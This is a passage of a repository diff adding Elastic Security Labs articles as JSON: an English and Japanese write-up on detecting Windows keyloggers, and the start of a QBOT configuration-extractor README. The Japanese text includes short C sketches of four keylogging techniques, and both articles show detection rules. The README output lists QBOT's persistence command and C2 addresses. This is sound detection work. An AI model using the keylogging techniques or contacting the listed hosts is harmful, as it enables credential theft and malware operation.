capabilities, Elastic Defend can provide comprehensive monitoring and detection of keylogging activity, enhancing the security and protection of Windows endpoints against these threats.\n\n### Detecting Windows keyloggers\n\nNext, let’s walk through an example of how the detection works in practice. We'll detect a keylogger using the Raw Input Model with Elastic Defend. For this example, we prepared a simple PoC keylogger named ```Keylogger.exe``` that uses the ```RegisterRawInputDevices``` API and executed it in our test environment ※5. (※5:The execution environment is Windows 10 Version 22H2 19045.4412, the latest version available at the time of writing.)\n\n\n \nShortly after the keylogger was executed, a detection rule ([Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)) was triggered on the endpoint, showing an alert. The further details of this alert can be viewed within Kibana.\n\n\n\nHere are the details of the detection rule, note the specific API referenced in the example. \n\n``` sql\nquery = '''\napi where\n process.Ext.api.name == \"RegisterRawInputDevices\" and not process.code_signature.status : \"trusted\" and\n process.Ext.api.parameters.usage : (\"HID_USAGE_GENERIC_KEYBOARD\", \"KEYBOARD\") and\n process.Ext.api.parameters.flags : \"*INPUTSINK*\" and process.thread.Ext.call_stack_summary : \"?*\" and\n process.thread.Ext.call_stack_final_user_module.hash.sha256 != null and process.executable != null and\n not process.thread.Ext.call_stack_final_user_module.path :\n (\"*\\\\program files*\", \"*\\\\windows\\\\system32\\\\*\", \"*\\\\windows\\\\syswow64\\\\*\",\n \"*\\\\windows\\\\systemapps\\\\*\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\*\\\\kumospace.exe\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe\") and \n not process.executable : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n'''\n```\n\nThis rule raises an alert when an unsigned process, or a process signed by an untrusted signer, calls the ```RegisterRawInputDevices``` API to capture keystrokes. More specifically, Elastic Defend monitors the arguments passed to the ```RegisterRawInputDevices``` API, particularly the members of the [```RAWINPUTDEVICE``` structure](https://learn.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-rawinputdevice), which is the first argument of this API.\n\nThis raises an alert when these argument values indicate an attempt to capture keyboard input. The logs of the ```RegisterRawInputDevices``` API can also be viewed within Kibana.\n\n\n\n### Data Collected During Windows API Calls\n\nDue to space constraints, this article does not cover all of the detection rules and API details that were added. However, we will briefly describe the data that Elastic Defend collects during calls to the relevant Windows APIs. For further explanations for each item, please refer to the Elastic Common Schema (ECS) mapping detailed in [```custom_api.yml```](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml).\n\n| API Name | Field | Description | Example |\n| --- | --- | --- | --- |\n| GetAsyncKeyState | process.Ext.api.metadata.ms_since_last_keyevent | This parameter indicates an elapsed time in milliseconds between the last GetAsyncKeyState event. | 94 |\n| GetAsyncKeyState | process.Ext.api.metadata.background_callcount | This parameter indicates a number of all GetAsyncKeyState api calls, including unsuccessful calls, between the last successful GetAsyncKeyState call. | 6021 |\n| SetWindowsHookEx | process.Ext.api.parameters.hook_type | Type of hook procedure to be installed. | \"WH_KEYBOARD_LL\"\n| SetWindowsHookEx | process.Ext.api.parameters.hook_module | DLL containing the hook procedure. | \"c:\\\\windows\\\\system32\\\\taskbar.dll\"\n| SetWindowsHookEx | process.Ext.api.parameters.procedure | The memory address of the procedure or function. | 2431737462784 |\n| SetWindowsHookEx | process.Ext.api.metadata.procedure_symbol | Summary of the hook procedure. | \"taskbar.dll\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.return_value | Return value of RegisterRawInputDevices API call. | 1 |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage_page | This parameter indicates the top-level collection (Usage Page) of the device. First member RAWINPUTDEVICE structure. | \"GENERIC\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage | This parameter indicates the specific device (Usage) within the Usage Page. Second member RAWINPUTDEVICE structure. | \"KEYBOARD\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.flags | Mode flag that specifies how to interpret the information provided by UsagePage and Usage. Third member RAWINPUTDEVICE structure. | \"INPUTSINK\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.windows_count | Number of windows owned by the caller thread. | 2 |\n| RegisterRawInputDevices | process.Ext.api.metadata.visible_windows_count | Number of visible windows owned by the caller thread. | 0 |\n| RegisterRawInputDevices | process.Ext.api.metadata.thread_info_flags | Thread info flags. | 16 |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_module | Name of the module associated with the starting address of a thread. | \"C:\\\\Windows\\\\System32\\\\DellTPad\\\\ApMsgFwd.exe\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_allocation_protection | Memory protection attributes associated with the starting address of a thread. | \"RCX\" |\n\n## Conclusion\n\nIn this article, we introduced the keylogger and keylogging detection features for Windows environments that were added starting from Elastic Defend 8.12. Specifically, by monitoring calls to representative Windows APIs related to keylogging, we have integrated a behavioral keylogging detection approach that does not rely on signatures. To ensure accuracy and reduce the false positive rate, we have created this feature and new rules based on months of research.\n\nIn addition to keylogging-related APIs, Elastic Defend also monitors [other APIs commonly used by malicious actors, such as those for memory manipulation](https://www.elastic.co/security-labs/doubling-down-etw-callstacks), providing multi-layered protection. If you are interested in Elastic Security and Elastic Defend, please check out the [product page](https://www.elastic.co/security) and [documentation](https://www.elastic.co/videos/intro-elastic-security).\n"
+ },
+ "title": "Protecting your devices from information theft",
+ "slug": "protecting-your-devices-from-information-theft-keylogger-protection",
+ "subtitle": "Keylogger detection using Windows API behaviors",
+ "date": "2024-05-30",
+ "description": "In this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from version 8.12), which is responsible for endpoint protection in Elastic Security.",
+ "author": [
+ {
+ "slug": "asuka-nakajima"
+ }
+ ],
+ "image": "Security Labs Images 10.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md.json
new file mode 100644
index 00000000000..68cf7e4535c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md.json
@@ -0,0 +1,36 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"情報窃取から端末を守る\"\nslug: \"protecting-your-devices-from-information-theft-keylogger-protection-jp\"\ndate: \"2024-05-30\"\nsubtitle: \"Windows APIの挙動を用いたキーロガー検知\"\ndescription: \"本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン8.12より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。\"\nauthor:\n- slug: asuka-nakajima\nimage: \"Security Labs Images 10.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\n本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン[8.12](https://www.elastic.co/guide/en/security/8.12/release-notes-header-8.12.0.html#enhancements-8.12.0)より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。\n\n## はじめに\n\nElastic Defend 8.12より、Windows上で動作するキーロガーおよび、キーロギング機能を備えたマルウェア(情報窃取型マルウェアや、リモートアクセス型トロイの木馬、通称RAT)の検知の強化を目的に、キーロガーが使用する代表的なWindows API群の呼び出しを監視・記録する機能が追加されました。本記事ではこの新機能に焦点を当て、その技術的な詳細を解説します。加えて、本機能に付随して新たに作成された振る舞い検知ルール(Prebuilt rule)についても紹介します。\n\n### キーロガーとはなにか?どのような危険性があるのか?\n\nキーロガーとは、コンピュータ上で入力されたキーの内容を監視および記録(キーロギング)するソフトウェアの一種です(※1)。キーロガーは、ユーザのモニタリングなどの正当な理由で利用されることもありますが、攻撃者によって頻繁に悪用されるソフトウェアです。具体的には、ユーザがキーボード経由で入力した認証情報やクレジットカード情報、各種機密情報などのセンシティブな情報の窃取などに際に使われます。(※1: パソコンにUSB等で直接取り付けるようなハードウェア型のキーロガーもありますが、本記事ではソフトウェア型のキーロガーに焦点を当てます。)\n\nキーロガーを通じて入手したセンシティブな情報は、金銭の窃取やさらなるサイバー攻撃の足がかりに悪用されます。それゆえに、キーロギング行為自体は直接的にコンピュータに被害をおよばさないものの、続くサイバー攻撃の被害を食い止めるためにも、早期の検知が非常に重要だと言えます。\n\nキーロギング機能を持つマルウェアは多々あり、特にRAT、情報窃取型マルウェア、バンキングマルウェアといった種類のマルウェアにキーロギング機能が搭載されている場合があることが確認されています。有名なマルウェアでキーロギング機能を有するものとしては[Agent Tesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla)や[Lokibit](https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot)、そして[SnakeKeylogger](https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger)などが挙げられます。\n\n### いかにして入力した文字を盗み取っているのか?\n\nでは次に、キーロガーはいかにしてユーザがキーボードから入力した文字を、ユーザに気づかれること無く盗み取っているのかを、技術的な観点から説明していきます。キーロガー自体は、あらゆるOS環境(Windows/Linux/macOSやモバイルデバイス)で存在しうるものではありますが、本記事ではWindowsのキーロガーに焦点を絞って解説します。特にWindows APIや機能を使用してキー入力を取得する4つの異なるタイプのキーロガーについて解説します。\n\n一点補足としては、ここでキーロギングの手法について説明しているのは、あくまで本記事後半で紹介している、新しい検知機能についての理解を深めていただくためです。そのため、例として掲載しているコードはあくまで単なる例であり、実際にそのまま動くコードが掲載されている訳ではありません(※3)。\n\n(※2: Windows上で動作するキーロガーは、カーネル空間(OS)側に設置されるものと、通常のアプリケーションと同じ領域(ユーザ空間)に設置されるものに大別されます。本記事では、後者のタイプを取り上げます。 )\n(※3: 以下に掲載されている例のコードを元にキーロガーを作成し悪用した場合、弊社では対応、および、責任について負いかねます 。)\n\n 1. ポーリング型キーロガー\n \nこのタイプのキーロガーは、キーボードの各キーの状態(キーが押された否か)を短い間隔(1秒よりはるかに短い間隔)で定期的に確認します。そして前回の確認以降に、新たに押されたキーがあることが判明した場合、その押されたキーの文字の情報を記録・保存します。この一連の流れを繰り返すことで、キーロガーは、ユーザが入力した文字列の情報を取得しているのです。\n\nポーリング型のキーロガーは、キーの入力状態をチェックするWindowsのAPIを利用して実装されており、代表的には [```GetAsyncKeyState```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getasynckeystate) APIが利用されます。このAPIは、特定のキーが現在押されているか否かに加えて、その特定のキーが前回のAPI呼び出し以降押されたか否かの情報を取得することが出来ます。以下が```GetAsyncKeyState``` APIを使ったポーリング型キーロガーの簡単な例です。\n\n``` C\nwhile(true)\n{\n for (int key = 1; key <= 255; key++)\n {\n if (GetAsyncKeyState(key) & 0x01)\n {\n SaveTheKey(key, \"log.txt\");\n }\n }\n Sleep(50);\n}\n```\n\nポーリング(```GetAsyncKeyState```)を用いてキー押下状態を取得する手法は、古くから存在する典型的なキーロギングの手法として知られているだけでなく、今でもマルウェアによって使われていることが確認されています。\n \n 2. フッキング型キーロガー\n \nフッキング型キーロガーは、ポーリング型キーロガーと同じく、古くから存在する典型的な種類のキーロガーです。ここではまず「そもそもフックとは何か?」について説明します。\n\nフックとは大雑把に言うと「アプリケーションの特定の処理に、独自の処理を割り込ませる仕組み」のことを指す言葉です。そして、フックを使って独自の処理を割り込ませることを「フックする」とも言います。Windowsでは、アプリケーションに対するキー入力などのメッセージ(イベント)をフックすることが出来る仕組みが用意されており、この仕組みは[SetWindowsHookEx](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-setwindowshookexa) APIを通じて利用することが出来ます。以下が```SetWindowsHookEx``` APIを使ったポーリング型キーロガーの簡単な例です。\n\n``` C\nHMODULE hHookLibrary = LoadLibraryW(L\"hook.dll\");\nFARPROC hookFunc = GetProcAddress(hHookLibrary, \"SaveTheKey\");\n\nHHOOK keyboardHook = NULL;\n \nkeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,\n (HOOKPROC)hookFunc,\n hHookLibrary,\n 0);\n```\n\n 3. Raw Input Modelを用いたキーロガー\n \nこのタイプのキーロガーは、キーボードなどの入力デバイスから得られた、生の入力データ(Raw Input)を取得し、それを保存・記録します。このキーロガーの詳細について説明する前に、まずWindowsにおける入力方式である「Original Input Model」と「Raw Input Model」について理解する必要があります。以下がそれぞれの入力方式についての説明です。\n\n - **Original Input Model**: キーボードなどの入力デバイスから入力されたデータを、一度OSを介して必要な処理をした後、アプリケーション側に届ける方式\n - **Raw Input Model**: キーボードなどの入力デバイスから入力されたデータを、そのままアプリケーション側が直接受け取る方式\n\nWindowsでは当初、Original Input Modelのみが使われていました。しかしWindows XP以降に、おそらくは入力デバイスの多様化などの要因から、Raw Input Modelが導入されました。Raw Input Modelでは、[```RegisterRawInputDevices```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-registerrawinputdevices) APIを使い、入力データを直接受け取りたい入力デバイスを登録します。そしてその後、[```GetRawInputData```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getrawinputdata)) APIを用いて生データを取得します。\n以下がこれらのAPIを使った、Raw Input Modelを用いたキーロガーの簡単な例です。\n\n``` C\nLRESULT CALLBACK WndProc(HWND hWnd, UINT uMessage, WPARAM wParam, LPARAM lParam)\n{\n\n UINT dwSize = 0;\n RAWINPUT* buffer = NULL;\n\n switch (uMessage)\n {\n case WM_CREATE:\n RAWINPUTDEVICE rid;\n rid.usUsagePage = 0x01; // HID_USAGE_PAGE_GENERIC\n rid.usUsage = 0x06; // HID_USAGE_GENERIC_KEYBOARD\n rid.dwFlags = RIDEV_NOLEGACY | RIDEV_INPUTSINK;\n rid.hwndTarget = hWnd;\n RegisterRawInputDevices(&rid, 1, sizeof(rid));\n break;\n case WM_INPUT:\n GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL,\n&dwSize, sizeof(RAWINPUTHEADER));\n\n buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);\n\n if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, \n&dwSize, sizeof(RAWINPUTHEADER)))\n {\n if (buffer->header.dwType == RIM_TYPEKEYBOARD)\n {\n SaveTheKey(buffer, \"log.txt\");\n }\n }\n HeapFree(GetProcessHeap(), 0, buffer);\n break;\n default:\n return DefWindowProc(hWnd, uMessage, wParam, lParam);\n }\n return 0;\n}\n```\n\nこの例では、最初に生入力を受け取りたい入力デバイスを```RegisterRawInputDevices```を用いて、登録します。ここでは、キーボードの生入力データを受け取るように設定・登録しています。\n\n 4. ```DirectInput```を用いたキーロガー\n \n最後に、```DirectInput```を用いたキーロガーについて説明します。このキーロガーは簡単に言えばMicrosoft DirectXの機能を悪用したキーロガーです。DirectXとは、ゲームや動画などのマルチメディア関連の処理を扱うためのAPI群の総称(ライブラリ)です。\n\nゲームにおいて、ユーザから各種入力が取得できることは必須機能と言って良いことから、DirectXにおいてもユーザの入力を処理するAPI群が提供されています。そして、DirectXのバージョン8以前に提供されていたそれらAPI群のことを「DirectInput」と呼びます。以下が```DirectInput```に関連するAPIを使ったキーロガーの簡単な例です。補足ですが、```DirectInput```を用いてキーを取得する際、裏では```RegisterRawInputDevices``` APIが呼ばれています。\n\n``` C\nLPDIRECTINPUT8\t\tlpDI = NULL;\nLPDIRECTINPUTDEVICE8\tlpKeyboard = NULL;\n\nBYTE key[256];\nZeroMemory(key, sizeof(key));\n\nDirectInput8Create(hInstance, DIRECTINPUT_VERSION, IID_IDirectInput8, (LPVOID*)&lpDI, NULL);\nlpDI->CreateDevice(GUID_SysKeyboard, &lpKeyboard, NULL);\nlpKeyboard->SetDataFormat(&c_dfDIKeyboard);\nlpKeyboard->SetCooperativeLevel(hwndMain, DISCL_FOREGROUND | DISCL_NONEXCLUSIVE | DISCL_NOWINKEY);\n\nwhile(true)\n{\n HRESULT ret = lpKeyboard->GetDeviceState(sizeof(key), key);\n if (FAILED(ret)) {\n lpKeyboard->Acquire();\n lpKeyboard->GetDeviceState(sizeof(key), key);\n }\n SaveTheKey(key, \"log.txt\");\t\n Sleep(50);\n}\n```\n\n## Windows API呼び出しを監視してキーロガーを検出する\n\nElastic Defendでは、Event Tracing for Windows (ETW ※4)を用いて、前述の種類のキーロガーを検知しています。具体的には、関連するWindows API群の呼び出しを監視し、その挙動のログを取得することで実現しています。監視するWindows API群と、付随して新規に作成したキーロガーの検知ルールは以下です。(※4 一言でいうとWindowsが提供する、アプリケーションやデバイスドライバなどのシステム側のコンポーネントを、トレースおよびロギングする仕組み。)\n\n### 監視するWindows API群:\n\n - [GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)\n - [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw)\n - [RegisterRawInputDevice](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices)\n\n### 追加したキーロガー検知ルール一覧:\n\n - [GetAsyncKeyState API Call from Suspicious Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_suspicious_process.toml)\n - [GetAsyncKeyState API Call from Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_unusual_process.toml)\n - [Keystroke Input Capture via DirectInput](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_directinput.toml)\n - [Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)\n - [Keystroke Messages Hooking via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_messages_hooking_via_setwindowshookex.toml)\n - [Keystrokes Input Capture from a Managed Application](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_managed_application.toml)\n - [Keystrokes Input Capture from a Suspicious Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_suspicious_module.toml)\n - [Keystrokes Input Capture from Suspicious CallStack](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_suspicious_callstack.toml)\n - [Keystrokes Input Capture from Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_unsigned_dll.toml)\n - [Keystrokes Input Capture via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_via_setwindowshookex.toml)\n\n新規に追加した機能および検知ルールにより、Elastic Defendにてキーロガー・キーロギングの包括的な監視と検出が可能となり、これらの脅威に対するWindowsエンドポイントのセキュリティと保護の強化を実現しました。\n\n### Windowsのキーロガーを検知する\n\n次に実際の検知の様子をお見せします。例として、Raw Input Modelを用いたキーロガーをElastic Defendで検出してみます。ここでは```RegisterRawInputDevices``` APIを用いた簡易的なキーロガー「Keylogger.exe」を用意し、テスト環境で実行してみました※5。(※5 実行環境はWindows 10の執筆時点の最新版であるWindows 10 Version 22H2 19045.4412です。)\n\n\n\nキーロガーを実行した直後に、検知ルール([Keystroke Input Capture via ```RegisterRawInputDevices```](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml))が発動し、エンドポイント側でアラートが上がりました。このアラートのさらなる詳細はKibana上から見ることが出来ます。\n\n\n\n以下が検知ルールの詳細です。検知に使われているAPIの部分を中心に説明します。\n\n``` sql\nquery = '''\napi where\n process.Ext.api.name == \"RegisterRawInputDevices\" and not process.code_signature.status : \"trusted\" and\n process.Ext.api.parameters.usage : (\"HID_USAGE_GENERIC_KEYBOARD\", \"KEYBOARD\") and\n process.Ext.api.parameters.flags : \"*INPUTSINK*\" and process.thread.Ext.call_stack_summary : \"?*\" and\n process.thread.Ext.call_stack_final_user_module.hash.sha256 != null and process.executable != null and\n not process.thread.Ext.call_stack_final_user_module.path :\n (\"*\\\\program files*\", \"*\\\\windows\\\\system32\\\\*\", \"*\\\\windows\\\\syswow64\\\\*\",\n \"*\\\\windows\\\\systemapps\\\\*\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\*\\\\kumospace.exe\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe\") and \n not process.executable : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n'''\n```\n\nこのアラートは簡単に言うと「署名されていないプロセス」または「署名されているが、その署名者が信頼できないプロセス」が、キー入力を取得する目的で```RegisterRawInputDevices``` APIを呼び出した時に発せられるアラートです。```RegisterRawInputDevices``` APIが呼び出された際の引数の情報に着目しており、より具体的にはAPIの第一引数である、[RAWINPUTDEVICE](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/ns-winuser-rawinputdevice)構造体のメンバの情報を検知に用いています。\n\nこの引数の値が、キーボード入力の取得を試みていることを示している場合、キーロガーが実行されたと見なして、アラートを上げるようになっています。 ```RegisterRawInputDevices``` APIのログはKibana上でも確認できます。\n\n\n\n### 各Windows APIの呼び出しの際に取得しているデータ\n\n分量の都合で、追加したすべての検知ルールとAPIの詳細については本記事では説明しません。ですが最後に、対象のWindows APIの呼び出しの際にElastic Defend側で取得しているデータについて、簡単にご紹介します。各項目についてさらに知りたい方は、[custom_api.yml](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml)に記載されているElastic Common Schema(ECS)とのマッピングをご参照ください。\n\n| API名 | フィールド | 説明(原文を日本語訳したもの) | 例 |\n| --- | --- | --- | --- |\n| GetAsyncKeyState | process.Ext.api.metadata.ms_since_last_keyevent | このパラメーターは、最後の GetAsyncKeyState イベントからの経過時間をミリ秒で示します。 | 94 |\n| GetAsyncKeyState | process.Ext.api.metadata.background_callcount | このパラメーターは、最後に成功した GetAsyncKeyState 呼び出しからの間に行われた、失敗した呼び出しも含めたすべての GetAsyncKeyState API 呼び出しの回数を示します。 | 6021 |\n| SetWindowsHookEx | process.Ext.api.parameters.hook_type | Tインストールするフックの種類 | \"WH_KEYBOARD_LL\"\n| SetWindowsHookEx | process.Ext.api.parameters.hook_module | フック先の処理を保有するDLL | \"c:\\\\windows\\\\system32\\\\taskbar.dll\"\n| SetWindowsHookEx | process.Ext.api.parameters.procedure | フック先となる処理や関数のメモリアドレス | 2431737462784 |\n| SetWindowsHookEx | process.Ext.api.metadata.procedure_symbol | フック先の処理の要約 | \"taskbar.dll\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.return_value | RegisterRawInputDevices API 呼び出しの戻り値 | 1 |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage_page | このパラメーターはデバイスのトップレベルコレクション(Usage Page)を示す。RAWINPUTDEVICE 構造体の最初のメンバ | \"GENERIC\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage | このパラメーターは、Usage Page 内の特定のデバイス(Usage)を示します。RAWINPUTDEVICE 構造体の2番目のメンバ | \"KEYBOARD\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.flags | UsagePageとUsageによって提供される情報をどのように解釈するかを指定するモードフラグ。RAWINPUTDEVICE 構造体の3番目のメンバ | \"INPUTSINK\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.windows_count | 呼び出し元スレッドが所有するウィンドウの数 | 2 |\n| RegisterRawInputDevices | process.Ext.api.metadata.visible_windows_count | 呼び出し元スレッドが所有する表示されているウィンドウの数 | 0 |\n| RegisterRawInputDevices | process.Ext.api.metadata.thread_info_flags | スレッドの情報を表すフラグ | 16 |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_module | スレッドの開始アドレスに紐づくモジュールの名前 | \"C:\\\\Windows\\\\System32\\\\DellTPad\\\\ApMsgFwd.exe\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_allocation_protection | スレッドの開始アドレスに紐づくメモリ保護属性 | \"RCX\" |\n\n## まとめ\n\n本記事では、Elastic Defend 8.12にて導入された、Windows環境におけるキーロガーおよびキーロギング検知機能についてご紹介しました。具体的には、キーロギングに関連する代表的なWindows API群の呼び出しを監視することで、シグネチャに依存しない、振る舞い検知によるキーロガー検出を実現しました。精度を高め、誤検知率を減らすために、数ヶ月にわたる研究・調査をもとにこの機能と新しいルールを開発しました。\n\nElastic Defendではキーロガー関連のAPI以外にも、攻撃者に一般的に利用されるメモリ操作等の[API群なども監視すること](https://www.elastic.co/security-labs/doubling-down-etw-callstacks)で、多層的な防御を実現しております。Elastic Security および Elastic Defendについて気になった方はぜひ[製品ページ](https://www.elastic.co/jp/security)や[ドキュメント](https://www.elastic.co/jp/videos/intro-elastic-security)を御覧頂ければ幸いです。\n"
+ },
+ "title": "情報窃取から端末を守る",
+ "slug": "protecting-your-devices-from-information-theft-keylogger-protection-jp",
+ "subtitle": "Windows APIの挙動を用いたキーロガー検知",
+ "date": "2024-05-30",
+ "description": "本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン8.12より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。",
+ "author": [
+ {
+ "slug": "asuka-nakajima"
+ }
+ ],
+ "image": "Security Labs Images 10.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_configuration_extractor-md.json
new file mode 100644
index 00000000000..8850a93e9f1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_configuration_extractor-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"QBOT Configuration Extractor\"\nslug: \"qbot-configuration-extractor\"\ndate: \"2022-12-06\"\nsubtitle: \"Configuration extraction tool for QBOT malware\"\ndescription: \"Python script to extract the configuration from QBOT samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - qbot\n - ref3726\n - qakbot\n---\n\nPython script to extract the configuration from QBOT samples.\n\n[Download qbot-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta4523f3b586ba6ac/62e16e26d2f5267009ac073a/qbot-config-extractor.tar.gz)\n\n## Getting Started\n\nThis tool provides a Python module and command line tool that will extract configurations from the QBOT malware samples and dump the results to screen.\n\n> For information on the QBOT attack pattern and malware analysis, check out our blog posts detailing this:\n>\n> - [Exploring the QBOT Attack Pattern](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)\n> - [QBOT Malware Analysis](https://www.elastic.co/security-labs/qbot-malware-analysis)\n\n### Docker\n\nWe can easily run the extractor with Docker, first we need to build the image:\n\n```\ndocker build . -t qbot-config-extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the docker container directory:\n\n```\ndocker run -ti --rm -v \\\n\"$(pwd)/data\":/data qbot-config-extractor:latest -d /data/\n```\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**.\n\n```\n$ docker run -ti --rm -v $(pwd)/data:/data qbot-config-extractor:latest -f data/c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\n\n=== Strings ===\n# Blob address: 0x100840a0\n# Key address: 0x10084040\n[0x0]: ProgramData\n[0xc]: /t4\n[0x10]: EBBA\n[0x15]: netstat -nao\n[0x22]: jHxastDcds)oMc=jvh7wdUhxcsdt2\n[0x40]: schtasks.exe /Create /RU \"NT AUTHORITY\\SYSTEM\" /SC ONSTART /TN %u /TR \"%s\" /NP /F\n\n...truncated...\n\n=== RESOURCE 1 ===\nKey: b'\\\\System32\\\\WindowsPowerShel1\\\\v1.0\\\\powershel1.exe'\nType: DataType.DOMAINS\n41.228.22.180:443\n47.23.89.62:995\n176.67.56.94:443\n103.107.113.120:443\n148.64.96.100:443\n47.180.172.159:443\n181.118.183.98:443\n\n...truncated...\n```\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nqbot-config-extractor -h\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "QBOT Configuration Extractor",
+ "slug": "qbot-configuration-extractor",
+ "subtitle": "Configuration extraction tool for QBOT malware",
+ "date": "2022-12-06",
+ "description": "Python script to extract the configuration from QBOT samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "qbot",
+ "ref3726",
+ "qakbot"
+ ]
+ },
